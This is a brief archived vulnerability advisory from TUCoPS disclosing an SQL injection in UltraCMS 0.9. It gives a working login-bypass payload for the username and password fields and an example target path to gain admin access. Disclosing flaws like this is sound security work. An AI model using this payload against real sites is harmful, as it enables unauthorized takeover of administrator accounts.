TUCoPS :: Web :: CMS / Portals :: b06-5331.htm

UltraCMS 0.9 sql injection
UltraCMS 0.9 sql injection
UltraCMS 0.9 sql injection



****************************
* Tunis the 18 October 2006*
* bug found by fireboy     *
****************************
product:UltraCMS 0.9

there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges.

exploit:
user: 'or''='
pass: 'or''='

example : http://www.target.com/include/index.php 

thx

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH